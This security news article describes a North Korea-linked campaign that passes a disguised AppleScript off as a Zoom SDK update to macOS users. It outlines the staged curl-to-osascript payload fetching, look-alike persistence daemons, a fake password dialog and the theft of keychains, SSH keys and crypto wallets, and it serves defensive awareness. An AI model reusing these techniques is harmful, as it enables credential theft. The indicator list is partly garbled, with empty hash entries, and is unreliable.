Beware: Fake Zoom SDK Update Delivers Sapphire Sleet Malware to macOS Users
A sophisticated cyberattack campaign has emerged, targeting macOS users through a deceptive Zoom Software Development Kit (SDK) update. The North Korean-linked threat actor, Sapphire Sleet, employs social engineering tactics to infiltrate systems and exfiltrate sensitive data, including passwords, cryptocurrency assets, and personal information.
The Deceptive Approach
Unlike traditional cyberattacks that exploit software vulnerabilities, this campaign relies on manipulating human behavior. Sapphire Sleet initiates contact by masquerading as a job recruiter on professional networking platforms. They engage potential victims in career-related discussions, building trust over time. Once rapport is established, the attacker schedules a fictitious technical interview, during which the victim is prompted to download a file named Zoom SDK Update.scpt.
Execution of the Attack
The downloaded file is a compiled AppleScript that opens in macOS’s native Script Editor application—a trusted and legitimate tool. This trustworthiness allows the script to bypass macOS’s built-in security measures without raising immediate red flags. The script presents what appears to be routine upgrade instructions, but hidden beneath thousands of blank lines lies malicious code poised for execution.
Microsoft’s Analysis and Response
Microsoft Threat Intelligence analysts have identified this campaign and noted that the specific combination of execution patterns, including the use of AppleScript as a dedicated credential-harvesting component, is unprecedented for Sapphire Sleet. Upon discovery, Microsoft responsibly disclosed their findings to Apple. In response, Apple has deployed XProtect signature updates and enhanced Safari’s Safe Browsing protections to detect and block infrastructure associated with this campaign.
Targeted Sectors and Data Exfiltration
Sapphire Sleet primarily focuses on individuals and organizations within the cryptocurrency, finance, venture capital, and blockchain sectors. Once the malware is active, it systematically harvests a wide array of sensitive information, including:
– User login passwords
– Telegram session data
– Browser credentials
– Cryptocurrency wallet keys from applications like Ledger Live and Exodus
– SSH keys
– macOS keychain databases
The collected data is then compressed and stealthily uploaded to attacker-controlled servers over port 8443.
Bypassing macOS Security Measures
The malware adeptly circumvents macOS security layers, including Gatekeeper and Transparency Consent and Control (TCC). By persuading the user to manually execute the file, Sapphire Sleet shifts the execution context to a user-initiated process. This strategic move allows the malware to operate without triggering standard security alerts, underscoring the critical importance of user vigilance.
Detailed Infection Chain
Upon opening the deceptive file, the attack progresses through a rapid sequence of commands:
1. Initial Execution: The script invokes the legitimate macOS softwareupdate binary with an invalid parameter to mimic a genuine system process.
2. Payload Retrieval: It utilizes the curl command to fetch a remote AppleScript payload, which is then passed directly to the osascript interpreter.
This pattern repeats across five stages, each monitored by user-agent strings (mac-cur1 through mac-cur5), enabling Sapphire Sleet to manage payload delivery and track the campaign’s progress.
Persistence Mechanisms
The mac-cur1 stage acts as the orchestrator, collecting system details, registering the infected machine with the command-and-control servers, and deploying a monitoring binary named com.apple.cli. Simultaneously, a backdoor called services installs a launch daemon named com.google.webkit.service.plist. This daemon is designed to closely resemble legitimate Apple and Google services, ensuring it persists across system reboots without drawing attention.
Credential Harvesting
In the mac-cur2 stage, the malware delivers a credential harvester named systemupdate.app. This component displays a native password dialog identical to a legitimate system prompt. When the unsuspecting user enters their credentials, the malware captures and exfiltrates this sensitive information.
Indicators of Compromise
To assist in identifying potential infections, the following indicators of compromise have been associated with this campaign:
– Malicious File Hashes:
– /Users/
– /Users/
– /Users/
– services / icloudz
– com.google.chromes.updaters
– com.google.webkit.service.plist
– /private/tmp/SystemUpdate/systemupdate.app/Contents/MacOS/Mac Password Popup
– /private/tmp/SoftwareUpdate/softwareupdate.app/Contents/MacOS/Mac Password Popup
– Domains and IP Addresses:
– uw04webzoom[.]us
– check02id[.]com
Protective Measures
To safeguard against such sophisticated attacks, users are advised to:
– Verify Sources: Always download software updates from official and trusted sources.
– Exercise Caution: Be wary of unsolicited communications, especially those prompting the download of files or software.
– Stay Updated: Ensure that your operating system and security software are up to date to benefit from the latest protective measures.
– Educate and Train: Regularly participate in cybersecurity awareness training to recognize and respond to social engineering tactics effectively.
By remaining vigilant and adhering to these best practices, users can significantly reduce the risk of falling victim to such deceptive and harmful campaigns.
